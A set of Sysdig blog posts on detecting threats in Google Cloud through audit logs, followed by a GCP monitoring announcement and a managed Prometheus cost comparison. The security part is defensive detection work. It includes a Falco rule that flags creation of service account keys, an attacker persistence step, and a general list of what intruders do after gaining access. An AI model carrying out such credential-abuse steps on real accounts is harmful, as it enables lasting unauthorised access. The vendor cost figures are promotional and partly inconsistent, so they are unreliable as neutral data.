Setting up all the detection rules and maintaining your GCP environment to keep it secure is an ongoing effort that can take a big chunk of your time – even more so if you don’t have some kind of roadmap to guide you during this continuous work.

You will be better off following the compliance standard(s) relevant to your industry, since they provide all the requirements needed to effectively secure your cloud environment.

Because of the ongoing nature of securing your infrastructure and complying with a security standard, you might also want to recurrently run benchmarks, such as CIS Google Cloud Platform Foundation Benchmark, which will audit your system and report any unconformity it might find.

Conclusion

Jumping to the cloud opens a new world of possibilities, but it also requires learning a new set of Google Cloud Platform security best practices.

Each new cloud service you leverage has its own set of potential dangers you need to be aware of.

Luckily, cloud native security tools like Falco and Cloud Custodian can guide you through these Google Cloud Platform security best practices, and help you meet your compliance requirements.


Secure DevOps on Google Cloud with Sysdig

We’re excited to partner with Google Cloud in helping our joint users more effectively secure their cloud services and containers.

Sysdig Secure cloud security capabilities enable visibility, security, and compliance for Google Cloud container services. This includes image scanning, runtime security, compliance, and forensics for GKE, Anthos, Cloud Run, Cloud Build, Google Container Registry, and Artifact Registry.

Having a single view across cloud, workloads, and containers will help decrease the time it takes to detect and respond to attacks.

Get started with managing cloud security posture free, forever, for one of your Google Cloud accounts. This includes a daily check against CIS benchmarks, cloud threat detection together with Cloud Audit Logs, and inline container image scanning for up to 250 images a month. You can get the free tier from the Google Cloud Marketplace, or click here to learn more and get started.


Detect suspicious activity in GCP using audit logs
GCP audit logs are a powerful tool that tracks everything happening in your cloud infrastructure. By analyzing them, you can detect and react to threats.

Modern cloud applications are not just virtual machines, containers, binaries, and data. When you migrated to the cloud, you accelerated the development of your apps and increased operational efficiency. But you also started using new assets in the cloud that need securing.

The shared responsibility model from cloud providers means that those cloud assets are being made secure by the providers, but part of that responsibility is yours as a cloud customer. Your cloud account is now the main door to all your information services. It is the most important thing to secure, and is the most desirable target for cybersecurity attacks.

Keep reading to discover how GCP audit logs work, and how to process them in an efficient way to implement cloud threat detection.

Cloud threat detection is key for a secure infrastructure

Cloud providers offer audit logs, a continuous stream of events detailing everything that is happening in your cloud account. These logs contain one event for each command executed on your cloud account.

This includes administrative commands that create, modify, or delete assets, but also read commands for asset metadata and data access events.

You can implement cloud threat detection by tapping into these audit logs and validating them against security policies. That way, you are able to detect and be informed about any misconfiguration, vulnerability, or compromise of private information as soon as it is detected.

The kind of threats you want to detect

Think of the steps attackers would take if they manage to obtain access to your infrastructure.

They’ll try to not get caught by disabling data access logging or deleting monitoring alerts. They could create additional keys for a service account to ensure they continue having access. Also, while they investigate your infrastructure, they’ll probably execute commands in regions that aren’t usually used.

All of those steps leave a recognizable trace in your audit logs.

Once malicious actors have a secure position on your cloud, they can start causing harm. For example, they could change the ACL or IAM policies of a storage bucket. This would make your files accessible to the public, leading to data exfiltration.

But you shouldn’t be looking out for only malicious actors.

One of your developers could create a GCP Cloud Function with an outdated runtime version, possibly containing known vulnerabilities that are already fixed in a more recent version. Those vulnerabilities could be exploited by attackers as an entry point, and then used to perform lateral movement.

Your cloud environment needs a continuous check to flag misconfigurations like these.

Cloud threat detection vs. CWPP and CSPM

While cloud threat detection focuses on your global cloud infrastructure, the CWPP category (Cloud Workload Protection Platform) refers to runtime threats happening in your compute workloads. Both analyze events to detect threats, but at different levels.

The CSPM category (Cloud Security Posture Management) has a completely different approach. It answers the question, “How secure is my cloud account now?” To do so, it focuses on analyzing the current state of the cloud account on a scheduled basis. For this reason, CSPM is more related to compliance and usually relies on different types of benchmarks like those published by the CIS (Center for Internet Security), the cloud providers, or other security standards.

Analyzing the whole static configuration, like CSPM does, gives the advantage of seeing the full picture of the cloud account, but is costly to execute continuously. On the other hand, cloud threat detection can easily detect when assets change to an unsanctioned status.

With all of this in mind, which one should you implement?

Well, all of them.

CSPM will highlight the points of your cloud infrastructure in need of better security, CWPP will flag anything fishy going on in your applications, and cloud threat detection will allow you to react to suspicious activity in your cloud infrastructure.

Implementing threat detection in GCP: Cloud Audit Logs

The service inside Google Cloud Platform (GCP) that enables cloud threat detection is Cloud Audit Logs.

The four audit logs

Inside Cloud Audit Logs, you’ll find four different kinds of logs:

  • Actions which modify the configuration or metadata of resources will leave a trace in the Admin Activity audit log.
  • Actions taken by Google which modify the configuration of resources will leave a trace in the System Event audit log.
  • Actions which read the configuration or metadata of resources, as well as actions which create, modify, or read data, will leave a trace in the Data Access audit log.
  • Actions which result in a security policy violation, and are thus denied by the Google Cloud Service, leave a trace in the Policy Denied audit log.

Be aware that public resources with the Identity and Access Management (IAM) policies allAuthenticatedUsers or allUsers won’t leave events on these logs for privacy reasons.

The Admin Activity audit log and the System Event audit log are always enabled. However, the Data Access audit log is disabled by default because it can grow really fast. The Policy Denied audit log is enabled by default, but could be disabled.
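
You can pull entries from these logs directly with the gcloud CLI. As a sketch, this reads recent Admin Activity entries from a placeholder PROJECT_ID:

gcloud logging read 'logName:"cloudaudit.googleapis.com%2Factivity"' --project=PROJECT_ID --limit=5 --format=json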

What an audit event looks like

All four of these audit logs are stored in JSON format and share some important structure, all including a protoPayload key consisting of the following fields:

  • authenticationInfo
  • authorizationInfo
  • serviceName
  • methodName
  • resourceName
  • request
  • requestMetadata
  • response
  • @type

There are several other fields outside the payload, including the timestamp of the entry, the resource affected, or the severity of the event.

In all cases @type contains the string type.googleapis.com/google.cloud.audit.AuditLog.

The following is an example of an entry in the Admin Activity audit log:

{
  "protoPayload": {
    "@type": "type.googleapis.com/google.cloud.audit.AuditLog",
    "status": {},
    "authenticationInfo": {
      "principalEmail": "juanya.villanueva@sysdig.com",
      "principalSubject": "user:juanya.villanueva@sysdig.com"
    },
    "requestMetadata": {},
    "serviceName": "iam.googleapis.com",
    "methodName": "google.iam.admin.v1.CreateServiceAccountKey",
    "authorizationInfo": [
      {
        "granted": true,
        "resource": "projects/-/serviceAccounts/123456789012345678901",
        "permission": "iam.serviceAccountKeys.create",
        "resourceAttributes": {}
      }
    ],
    "resourceName": "projects/-/serviceAccounts/123456789012345678901",
    "request": {
      "@type": "type.googleapis.com/google.iam.admin.v1.CreateServiceAccountKeyRequest",
      "name": "projects/-/serviceAccounts/ab1c315d6e7fgh6891026@test.iam.gserviceaccount.com",
      "private_key_type": 2
    },
    "response": {},
  "insertId": "m8ab679xmpg5",
  "resource": {
    "type": "service_account",
    "labels": {}
  },
  "timestamp": "2021-03-17T17:33:44.852270Z",
  "severity": "NOTICE",
  "logName": "projects/sample-project/logs/cloudaudit.googleapis.com%2Factivity",
  "receiveTimestamp": "2021-03-17T17:33:49.462759141Z"
}

Processing GCP audit logs

The first part of cloud threat detection is generating all these audit events. The second part is validating them against your security policies.

Other services, like your security tools, can consume these events via a Pub/Sub topic.

First, you filter the audit logs and send your selected events to a sink that will forward them to a Pub/Sub topic. You just have to subscribe your security tool endpoints to this topic so they can process them.

These sinks will encrypt and validate the logs to make sure they are not tampered with after GCP generates them.
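
Put together, a minimal sketch of this plumbing could look like the following, with all names as placeholders:

gcloud pubsub topics create TOPIC_NAME
gcloud logging sinks create SINK_NAME pubsub.googleapis.com/projects/PROJECT_ID/topics/TOPIC_NAME --log-filter='logName:"cloudaudit.googleapis.com"'
gcloud pubsub subscriptions create SUBSCRIPTION_NAME --topic=TOPIC_NAME

Grant the sink’s writer identity the Pub/Sub Publisher role on the topic, and point your security tool at the subscription.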

How Sysdig Secure for cloud implements runtime detection in GCP

Sysdig Secure for cloud taps into the Google Cloud Platform audit logs and processes the audit events against your security policies, defined by Falco rules.

A specialized ingestor feeds on the Cloud Audit Logs and forwards the GCP events to an evaluator.

Provisioned with a rich set of custom, out-of-the-box Falco rules, this evaluator will generate security events that can be reviewed inside the Sysdig Secure interface, GCP Trace, or GCP Security Command Center.

Out-of-the-box Falco rules mapped to compliance controls

The Falco rule language has become the de-facto standard to define suspicious activity in the cloud, and its flexibility allows for fine-grained customization to your operational needs.

While the out-of-the-box Falco rules, pre-bundled with Sysdig Secure for cloud, will save you time getting started, you can still customize them or add new rules to this library to detect any cloud activity.

The included GCP Cloud Audit Logs rules are mapped against compliance controls, like those in MITRE ATT&CK, and can detect events like the service account key creation shown in the example below.

Sysdig Secure for cloud comes bundled with a rich set of out-of-the-box Falco rules that, besides MITRE ATT&CK®, correspond to security standards and benchmarks like NIST 800-53, PCI DSS, SOC 2, CIS AWS, or AWS Foundational Security Best Practices.

Detecting a configuration change with Cloud Audit Logs

Let’s see an example of GCP threat detection in action with Cloud Audit Logs and Sysdig Secure for cloud.

Take a look at the Admin Activity audit log event we presented before:

{
  "protoPayload": {
    "@type": "type.googleapis.com/google.cloud.audit.AuditLog",
    "status": {},
    "authenticationInfo": {
      "principalEmail": "juanya.villanueva@sysdig.com",
      "principalSubject": "user:juanya.villanueva@sysdig.com"
    },
    "requestMetadata": {},
    "serviceName": "iam.googleapis.com",
    "methodName": "google.iam.admin.v1.CreateServiceAccountKey",
    "authorizationInfo": [
      {
        "granted": true,
        "resource": "projects/-/serviceAccounts/123456789012345678901",
        "permission": "iam.serviceAccountKeys.create",
        "resourceAttributes": {}
      }
    ],
    "resourceName": "projects/-/serviceAccounts/123456789012345678901",
    "request": {
      "@type": "type.googleapis.com/google.iam.admin.v1.CreateServiceAccountKeyRequest",
      "name": "projects/-/serviceAccounts/ab1c315d6e7fgh6891026@test.iam.gserviceaccount.com",
      "private_key_type": 2
    },
    "response": {},
  "insertId": "m8ab679xmpg5",
  "resource": {
    "type": "service_account",
    "labels": {}
  },
  "timestamp": "2021-03-17T17:33:44.852270Z",
  "severity": "NOTICE",
  "logName": "projects/sample-project/logs/cloudaudit.googleapis.com%2Factivity",
  "receiveTimestamp": "2021-03-17T17:33:49.462759141Z"
}

This event captures the creation of a service account key, which can pose a security threat.

The key fields in this event are:

  • serviceName: The service that fires the event, iam.googleapis.com.
  • methodName: The actual method invoked, google.iam.admin.v1.CreateServiceAccountKey.
  • principalEmail: The user who invokes the event, juanya.villanueva@sysdig.com.
  • resourceName: The resource being modified, projects/-/serviceAccounts/123456789012345678901.
  • status: Reflects the status of the request.

A non-empty status field in a request means that it could not be processed because of an error. For example, the requester may not have had permission to perform the action. We might not be interested in these events.

Let’s go back to our example. This event tells us that a key has just been created via the google.iam.admin.v1.CreateServiceAccountKey method for the service account in the resource projects/-/serviceAccounts/123456789012345678901.

A Falco rule to detect this security event would look like:

- rule: GCP Create Service Account Key
  desc: Detect creating an access key for a service account.
  condition:
    jevt.value[/serviceName]="iam.googleapis.com" and
    jevt.value[/methodName]="google.iam.admin.v1.CreateServiceAccountKey" and
    jevt.value[/status]=""
  output:
    An access key has been created for a service account
    (requesting user=%jevt.value[/authenticationInfo/principalEmail],
     service account=%jevt.value[/resourceName])
  priority: CRITICAL
  tags:
    - cloud
    - gcp
    - gcp_iam
    - cis_controls_16
    - mitre_T1550-use-alternate-authentication-material
  source: gcp_auditlog

Note that this is one of the out-of-the-box rules included in Sysdig Secure for cloud.

Using jevt.value and a query in jsonpath format, we can reference parts of the audit event.

We use this in the condition part of the rule:

  condition:
    jevt.value[/serviceName]="iam.googleapis.com" and
    jevt.value[/methodName]="google.iam.admin.v1.CreateServiceAccountKey" and
    jevt.value[/status]=""

This condition filters for events that are related to the IAM service, create a service account key, and have an empty status.

The same is true for %jevt.value, which we use in the output part of the rule:

  output:
    An access key has been created for a service account
    (requesting user=%jevt.value[/authenticationInfo/principalEmail],
     service account=%jevt.value[/resourceName])

This output is used to provide context information, given that this rule ends up generating a security event. In that case, this output will be sent through all of the enabled notification channels, for example, creating a security event in your Sysdig Secure account.

We have one final note on creating Falco rules for cloud events.

This is a regular Falco rule, following the regular Falco syntax. The compatibility with GCP Cloud Event Logs is achieved by handling its events as JSON objects and referring to the event information using JSONPath. This mixes two standards that your security engineers might be already familiar with, making it easier to customize and create your own rules.

Conclusions

Cloud threat detection is critical to ensure the security of your cloud infrastructure, and it’s a complement to CWPP and CSPM.

When it comes to the Google Cloud Platform, GCP Cloud Audit Logs is a great tool that enables you to monitor your infrastructure and detect security issues as they happen.

Sysdig Secure for cloud is a great source of truth as it can see everything that is happening in your GCP accounts. The comprehensive set of out-of-the-box Falco rules in Sysdig Secure minimizes the setup effort, response time, and resources needed for investigating security events.

With Sysdig Secure for cloud, you can continuously flag cloud misconfigurations before the bad guys get in, and detect suspicious activity like unusual logins from leaked credentials. This all happens in a single console, making it easier to validate your cloud security posture. And it only takes a few minutes to get started!

Start securing your cloud for free with our Sysdig Free Tier!

The Sysdig Secure DevOps Platform provides the visibility you need to confidently run containers, Kubernetes, and cloud. It’s built on an open-source stack with SaaS delivery, and is radically simple to run and scale.

Request a free trial today!

Easily Monitor Google Cloud with Sysdig’s Managed Prometheus
Google Cloud provides its own set of metrics for monitoring applications, services, and instances. There are a huge number of metrics – more than 1,500 different ones just for GCP monitoring! While this is great, dealing with such a number can also be overwhelming. Filtering, pulling, exploring, and storing the metrics that you really need can be an enormously time-consuming task, and a big challenge.

GCP offers its own managed Prometheus service, which can be used to collect and explore GCP Prometheus metrics, as well as other metrics that you may want to scrape from other exporters. It is a separate product, so it has its own pricing model.

Sysdig can help to alleviate this excessive burden.

Today we are happy to announce the general availability of GCP metrics support in Sysdig Monitor. Just connect your GCP account, enable the integration, and benefit from the out-of-the-box GCP monitoring.

Multi-cloud monitoring with Sysdig Monitor

Thanks to its multi-cloud integration model, Sysdig customers can easily monitor AWS, Azure, and GCP workloads and services from a single pane of glass.

You can now correlate your own applications, services, and Prometheus metrics with Kubernetes and cloud context, without any extra effort.

Forget about taking care of exporters or any other service to pull your GCP metrics. Everything is handled by Sysdig Monitor. The same way Sysdig Monitor works with third-party applications and services, it offers a completely smooth experience for GCP integration.

All the steps you need to successfully link your GCP account with Sysdig Monitor are provided through a step-by-step wizard. Tons of predefined alerts, and a bundle of out-of-the-box dashboards to monitor and troubleshoot your GCP services, are some of the benefits of integrating and monitoring GCP with Sysdig Monitor.

These, and other benefits like the Kubernetes and cloud metrics enrichment or the automatic metrics ingestion, are supported and maintained by Sysdig. You don’t need to waste time on these things anymore. Rather, use your time for what’s most important: your business.

Integrating GCP is easy. After a few minutes, you’ll have access to plenty of information from your Cloud instances and services.

How to get started

The GCP monitoring integration is available now! If you want to start pulling your GCP Prometheus metrics, just follow these few steps:

  1. In the Sysdig Monitor panel, go to Integrations and click on Cloud Metrics.
  2. Click on Add Account to launch the Cloud integration assistant.
  3. Select GCP and choose between Organization or Single, depending on whether you want to connect your whole org or a single project.
  4. Follow the instructions to configure this Cloud integration.
  5. Wait a few minutes and look for the new out-of-the-box GCP dashboards.

Dig deeper into GCP with Sysdig integrations

In this new release, Sysdig has prepared a set of new integrations for GCP – from checking the health and performance of your GCP Cloud MySQL, PostgreSQL, or SQL Server instances, to ensuring your GCP compute engine instances are behaving properly. A new bundle of predefined alerts and out-of-the-box dashboards will be automatically shown a few minutes after you configure the GCP integration in the Sysdig Monitor portal.

Conclusion

Integrating GCP with Sysdig Monitor is super simple. Thanks to this new integration, you can now store and explore your own GCP service metrics in a few minutes!

The main public Cloud providers like AWS, Azure, and GCP are integrated into the multi-cloud Sysdig Monitor platform. You can not only monitor and troubleshoot your cloud-native workloads, but also your own cloud provider metrics. In Sysdig Monitor, everything is close by. You can have full control of all your cloud environments from a single place.

Sign up here for a free trial of Sysdig Monitor. While you are there be sure to check out our Kubernetes troubleshooting, managed Prometheus, and cost optimization features.

The post Easily Monitor Google Cloud with Sysdig’s Managed Prometheus appeared first on Sysdig.

]]>
How Much Does Your Managed Service for Prometheus Cost? https://sysdig.com/blog/managed-service-prometheus/ Tue, 25 Apr 2023 14:45:51 +0000 https://sysdig.com/?p=71131 […]

The post How Much Does Your Managed Service for Prometheus Cost? appeared first on Sysdig.

]]>
Are you using a managed service for Prometheus and finding the costs too high? Or are you considering delegating your Prometheus metrics ingestion, processing, and management and want to know more about the costs involved?

Nowadays, many companies opt for a managed service for Prometheus instead of maintaining their own OSS Prometheus monitoring bundle. This approach is becoming increasingly common, as it allows businesses to reduce their operational and infrastructure monitoring spending and take the burden off their teams.

When evaluating and ultimately choosing a managed Prometheus service, there are many factors to consider, with pricing being one of the most important. Planning ahead and understanding how costs are calculated is crucial to avoid unpleasant surprises in the form of unexpected high bills.

This article will provide insights into how the leading managed Prometheus service providers charge for their services, highlighting the most expensive and the most affordable options.

Managed service for Prometheus pricing

Disclaimer: In this article, you’ll find the prices that correspond to the time this blog post was written (April 2023). For current pricing, please check the public pricing information from every vendor.

AWS

The current Amazon managed service for Prometheus prices are available here. Amazon also provides its own pricing calculator to estimate your bill.

Amazon charges for different services within its Amazon managed service for Prometheus, like the metric ingestion costs, storage, and query. Metric ingestion is charged per sample.

Metrics ingestion | Cost ($/10M samples)
First 2 billion samples | $0.90
Next 250 billion samples | $0.35
Over 252 billion samples | $0.16

Other costs | Cost
Metrics storage | $0.03/GB-Mo
Query Samples Processed (QSP) | $0.10/B samples processed

Google Cloud

Google Cloud monitoring pricing is available on its website. Google also has its own pricing calculator, just select “Cloud operations (Logging, Monitoring, Trace, Managed Prometheus)” and estimate your bill.

Google Cloud charges metric ingestion per sample. The following table shows the Google Cloud monitoring pricing.

Metrics ingestion | Cost ($/1M samples)
First 50 billion (B) samples | $0.15
Next 50B-250B samples | $0.12
Next 250B-500B samples | $0.09
> 500B samples | $0.06

Some other items such as “Monitoring API calls” usage and “Execution of monitoring uptime checks” may or may not be charged, depending on the usage within a full month.

Azure

Azure Monitor pricing is available here. If you want to estimate your Azure Monitor bill, you can use its pricing calculator. Azure charges metrics ingestion per sample.

Metrics ingestion | Cost ($/10M samples)
Any number of samples | $0.16

Queries | Cost ($/1B samples)
Metrics queries | $0.10

Azure charges for alerts and notifications as well, such as emails, push notifications, or webhooks, among others.

Grafana Labs

If you want to check the Grafana Cloud pricing model, visit its website. In the pricing page, you can also calculate the estimated cost of your bill. Grafana Labs charges metrics ingestion per time series (TS).

Metrics ingestion | Cost ($/1,000 time series)
First 20K TS | Included in monthly usage subscription
Next 1K TS | $8

Grafana Labs charges based on active series, which may cause your bill to vary depending on your metric usage. On the other hand, alerting and QSP are included, so no extra costs are incurred.

Per Grafana Labs documentation, a time series is considered active if new data points have been received within the last 15 or 30 minutes.

Sysdig Monitor

Sysdig Monitor charges metric ingestion per time series. Following, you’ll find Sysdig’s metrics pricing.

Metrics ingestion | Cost ($/1,000 time series)
Node exporter, cAdvisor, and KSM metrics | Included ($0)
First 2K TS per node | Included in agent subscription ($0)
> 2K TS per agent | $5

Note that node exporter, KSM, and cAdvisor time series are included in the Sysdig Agent price. Hence, these time series are not charged. In addition, alerting and QSP are included, so you won't be charged for these features either.

Price comparison per TS

If you extrapolate the information you obtained from providers that charge based on samples, you can obtain the time series equivalent. This way, you can compare costs between managed Prometheus service providers.

How can you calculate the TS equivalent from samples? Let's compute how many samples a single TS generates per month at different ingestion sampling intervals.

  • 60s interval -> 1TS / 60s * 3,600s in an hour * 744 hours in a month = 44,640 samples
  • 30s interval -> 1TS / 30s * 3,600s in an hour * 744 hours in a month = 89,280 samples
  • 10s interval -> 1TS / 10s * 3,600s in an hour * 744 hours in a month = 267,840 samples

Based on these numbers you can easily convert prices per sample into prices per time series.
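
As a quick sanity check, here is a minimal Python sketch of this conversion (the helper names are ours; the prices are the published ones quoted above). It reproduces a couple of rows from the table below.

  # Convert a per-sample price into a monthly price per time series (TS),
  # assuming 744 hours in a month, as in the calculations above.
  def samples_per_ts_month(interval_s: int) -> float:
      """Samples that one TS produces in a month at a given scrape interval."""
      return 1 / interval_s * 3600 * 744

  def cost_per_ts_month(interval_s: int, price: float, samples_per_unit: float) -> float:
      """Monthly cost of one TS, given a price per block of samples."""
      return samples_per_ts_month(interval_s) * price / samples_per_unit

  # AWS first tier at 60s: $0.90 per 10M samples -> ~$0.0040 per TS/month
  print(round(cost_per_ts_month(60, 0.90, 10_000_000), 4))  # 0.004
  # GCP first tier at 10s: $0.15 per 1M samples -> ~$0.0402 per TS/month
  print(round(cost_per_ts_month(10, 0.15, 1_000_000), 4))   # 0.0402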

Vendor (interval / tier) | TS conversion | Samples per TS/month | Price | Samples per price unit | Cost per TS/month ($)
AWS (60s) 2B samples | 44,802.87 | 44,640.00 | $0.90 | 10,000,000.00 | 0.0040
AWS (60s) Next 250B samples | 5,600,358.42 | 44,640.00 | $0.35 | 10,000,000.00 | 0.0016
AWS (60s) over 252B samples | 47,903,493.71 | 44,640.00 | $0.16 | 10,000,000.00 | 0.0007
AWS (30s) 2B samples | 22,401.43 | 89,280.00 | $0.90 | 10,000,000.00 | 0.0080
AWS (30s) Next 250B samples | 2,800,179.21 | 89,280.00 | $0.35 | 10,000,000.00 | 0.0031
AWS (30s) over 252B samples | 50,726,074.35 | 89,280.00 | $0.16 | 10,000,000.00 | 0.0014
AWS (10s) 2B samples | 7,467.14 | 267,840.00 | $0.90 | 10,000,000.00 | 0.0241
AWS (10s) Next 250B samples | 933,393.07 | 267,840.00 | $0.35 | 10,000,000.00 | 0.0094
AWS (10s) over 252B samples | 52,607,794.78 | 267,840.00 | $0.16 | 10,000,000.00 | 0.0043
GCP (60s) First 50B samples | 1,120,071.68 | 44,640.00 | $0.15 | 1,000,000.00 | 0.0067
GCP (60s) Next 50B-250B samples | 4,480,286.74 | 44,640.00 | $0.12 | 1,000,000.00 | 0.0054
GCP (60s) Next 250B-500B samples | 5,600,358.42 | 44,640.00 | $0.09 | 1,000,000.00 | 0.0040
GCP (60s) >500B samples | 42,347,938.15 | 44,640.00 | $0.06 | 1,000,000.00 | 0.0027
GCP (30s) First 50B samples | 560,035.84 | 89,280.00 | $0.15 | 1,000,000.00 | 0.0134
GCP (30s) Next 50B-250B samples | 2,240,143.37 | 89,280.00 | $0.12 | 1,000,000.00 | 0.0107
GCP (30s) Next 250B-500B samples | 2,800,179.21 | 89,280.00 | $0.09 | 1,000,000.00 | 0.0080
GCP (30s) >500B samples | 47,948,296.58 | 89,280.00 | $0.06 | 1,000,000.00 | 0.0054
GCP (10s) First 50B samples | 186,678.61 | 267,840.00 | $0.15 | 1,000,000.00 | 0.0402
GCP (10s) Next 50B-250B samples | 746,714.46 | 267,840.00 | $0.12 | 1,000,000.00 | 0.0321
GCP (10s) Next 250B-500B samples | 933,393.07 | 267,840.00 | $0.09 | 1,000,000.00 | 0.0241
GCP (10s) >500B samples | 51,681,868.86 | 267,840.00 | $0.06 | 1,000,000.00 | 0.0161
Azure (60s) Any number of samples | - | 44,640.00 | $0.16 | 10,000,000.00 | 0.0007
Azure (30s) Any number of samples | - | 89,280.00 | $0.16 | 10,000,000.00 | 0.0014
Azure (10s) Any number of samples | - | 267,840.00 | $0.16 | 10,000,000.00 | 0.0043
Grafana Labs (60s) First 20,000 TS | - | - | - | - | Included in subscription
Grafana Labs (60s) > 20,000 TS | - | - | - | - | 0.0080
Sysdig (10s) node exporter, cAdvisor, KSM TS | - | - | - | - | Included in subscription
Sysdig (10s) First 2,000 TS per node | - | - | - | - | Included in subscription
Sysdig (10s) > 2,000 TS per node | - | - | - | - | 0.0050

K8s single cluster use case

Note that the number of time series you can have in your Prometheus instance can vary significantly and depends on your architecture. The more applications and operational tasks (redeploys, creation, deletion, and scaling) in your cluster, the more time series you will generate. Depending on how volatile your Pods and Kubernetes objects are, cardinality explosions may occur and can cause serious trouble. The more time series you have, the more storage you need, the more prone you are to scalability and performance issues, and the higher your costs.

Let’s mock up a sample architecture that will serve as a foundation to estimate the managed service for Prometheus costs for every vendor.

For this use case, we have the following information about the Kubernetes infrastructure:

  • One Kubernetes cluster
  • 25 nodes

Next, you'll find the total number of time series registered in the Prometheus instance after a few days. This Kubernetes cluster was running under a normal load, not stressed by heavy workloads or peaks of user activity. To emulate a minimal but realistic application lifecycle, we redeployed a few applications every day. These are the numbers of time series generated, by job:

  • kubernetes-apiservers: 73,713 TS
  • kubernetes-pods: 275,421 TS
  • kubernetes-nodes-cadvisor: 257,649 TS
  • kubernetes-service-endpoints (node exporter + KSM): 144,202 TS
  • kubernetes-nodes: 42,166 TS
  • kube-dns: 370 TS
  • etcd: 4,399 TS
  • prometheus: 1,068 TS
  • felix_metrics: 4,008 TS
  • kube_controller_metrics: 63 TS
  • Time series TOTAL: 803,059

In terms of query processing and user activity, let’s start with the following assumptions:

  • 10 different users accessing Prometheus with their own dashboards and graphs reporting data for their projects.
  • An average of eight graphs querying data per user.
  • The refresh interval for each graph is 10 seconds. Assuming an average of two hours per user per day, that corresponds to 720 queries per graph, or 5,760 queries per user per day across the eight graphs.
  • Data is being shown in a three hour timeframe on average.
  • The highest number of samples processed in this environment for three hours is 867,303,720.
  • We’ll assume 300,000 samples on average per query.
  • Monitoring query processing ~525,657,600,000 (1)
  • Alerting query processing ~5,256,000,000,000 (2)

(1) Monitoring query processing has been calculated from: 10 monitoring users * 5,760 queries per day and user * 30 days a month * 300,000 avg samples per query (3h).

(2) Alerting query processing has been calculated from: 2 executions per minute * 200 alerts * 60 minutes per hour * 730 hours per month * 300,000 avg samples per alerting rule.

Once we have all the data, let’s do some math!

First, we need to calculate the number of samples ingested based on our numbers.

803,059 TS / 10 (collection interval in seconds) * 3,600 seconds per hour * 744 hours in a month = 215,091,322,560 -> ~215 billion samples.

For those services where storage costs are charged, let’s assume that storage initially needed for that volume of metrics is ~12GB.

With regards to queries processed, based on the previous calculations, we'll assume that the total volume of query samples processed is ~5,781 billion per month. You may think this number is too large but, on the contrary, it may be too small if we take into account that a single query may touch millions of samples.

Notice that a 10-second sampling interval was used to calculate the total number of samples. Some vendors, like Grafana Labs, implement a 60-second sampling interval by default.
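
For reference, here is a short Python sketch reproducing these estimates from the figures stated above (the variable names are ours):

  # Monthly samples ingested: 803,059 TS scraped every 10 seconds.
  total_ts = 803_059
  interval_s = 10
  samples_month = total_ts / interval_s * 3600 * 744
  print(f"{samples_month:,.0f}")                 # 215,091,322,560 (~215B samples)

  # Total query samples processed (QSP) per month, from estimates (1) and (2):
  monitoring_qsp = 525_657_600_000
  alerting_qsp = 5_256_000_000_000
  print(f"{(monitoring_qsp + alerting_qsp) / 1e9:,.1f}B")   # 5,781.7B (~5,781B)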

Disclaimer: Following, you’ll find a quick calculation of the managed service for Prometheus costs for every vendor. Bear in mind that this is an approximation, cost may fluctuate depending on the usage of your monitoring platform.

AWS

Let’s see what the costs charged by each service would be.

Service | Cost
TS first 2B samples | 2B samples * $0.90/10M = $180
TS next 250B samples | 213,091,322,560 samples * $0.35/10M = $7,458.19
Storage | $0.03 * 12.92GB * 365 days = $141.52 / month
Query Samples Processed (QSP) | $0.10/B * 5,781B = $578.10 / month
Total cost | $180 + $7,458.19 + $141.52 + $578.10 = $8,357.81 / month

So, if you own an Amazon managed service for Prometheus for processing the monitoring data belonging to the architecture defined earlier, you would spend around $8,357 a month.

GCP

It’s now time to analyze the pricing for Google Cloud monitoring.

Service | Cost
TS first 50B samples | 50B samples * $0.15/1M = $7,500
Next 50B-250B samples | 165,091,322,560 samples * $0.12/1M = $19,810.95
Total cost | $7,500 + $19,810.95 = $27,310.95

If you own a Google Cloud monitoring instance for processing the same data, you’ll pay around $27,310 a month.

Azure

Let’s analyze the Azure offering for monitoring and ingesting your Prometheus metrics.

Service | Cost
TS | 215,091,322,560 samples * $0.16/10M = $3,441.46
Query processing | $0.10/B * 5,781B = $578.10
Total cost | $3,441.46 + $578.10 = $4,019.56 / month

Using Azure for this specific use case would cost around $4,019 a month, and you’d also need to take into account the costs related to alerts and notifications, which are extra assets that would be charged.

Grafana Labs

These are the Grafana Labs costs for its Grafana Cloud product with a 10-second sampling interval.

Since the cost will vary depending on your active metrics, let’s suppose all of your metrics (100%) are active.

Service | Cost
Service fee | $299 / month
TS first 20K | Included in subscription
TS > 20K | 803,059 - 20,000 = 783,059 TS; 783,059 * $8 / 1,000 = $6,264.47
Total cost | $299 + $6,264.47 = $6,563.47

With Grafana Labs, total cost would be around $6,563 a month.

Sysdig Monitor

Sysdig Monitor implements a 10-second sampling interval by default, ingesting up to 6x more data points than competitors that sample every 60 seconds, and at a lower cost, as you'll see next.

First of all, you need to remove the node exporter, cAdvisor, and KSM metrics from the current numbers, since they are not billed. For the sake of simplicity, let's subtract the following jobs from the total number of time series:

  • kubernetes-nodes-cadvisor: 257,649 TS
  • kubernetes-service-endpoints (node exporter + KSM): 144,202 TS
  • kubernetes-nodes: 42,166 TS

The new TOTAL number of time series is: 803,059 – 257,649 – 144,202 – 42,166 = 359,042 TS. The number of billable time series has been reduced by ~55%!

Service | Cost
Agent cost | $30 * 25 nodes = $750
Metrics included in agent subscription | 2,000 * 25 nodes = 50,000 TS included free of charge
Metrics ingestion | Next 309,042 TS * $5 / 1,000 = $1,545.21 / month
Total cost | $750 + $1,545.21 = $2,295.21 / month

If you use Sysdig Monitor as your managed service for Prometheus, you’d pay around $2,295 a month.
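
The arithmetic above is easy to reproduce. A minimal Python sketch, assuming the $30/node agent price and the $5 per 1,000 TS rate from the tables above:

  # Sysdig single-cluster cost: 25 nodes, 359,042 billable TS after removing
  # the node exporter, cAdvisor, and KSM jobs (included free of charge).
  nodes = 25
  billable_ts = 359_042
  included_ts = 2_000 * nodes                           # 50,000 TS included with agents
  agent_cost = 30 * nodes                               # $750 / month
  ingestion = (billable_ts - included_ts) * 5 / 1_000   # $5 per 1,000 TS -> $1,545.21
  print(agent_cost + ingestion)                         # 2295.21 -> ~$2,295 / month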

Price comparison

After doing all the calculations, it’s time to sum up the costs of every service. This time, the price is calculated by TS for different ingestion intervals (60s, 30s, and 10s).

TS calculator | AWS First ~44,800/22,400/7,500 TS | AWS Next ~933,393 TS | GCP First ~1,120,071/560,035/186,678 TS | GCP Next ~746,714 TS | Azure (any number of TS) | Grafana Labs & Sysdig | QSP | Disk | TOTAL
AWS (60s) | $180.00 | $1,184.70 | - | - | - | - | $578.17 | $141.52 | $2,084.38
AWS (30s) | $180.00 | $2,439.40 | - | - | - | - | $578.17 | $141.52 | $3,339.08
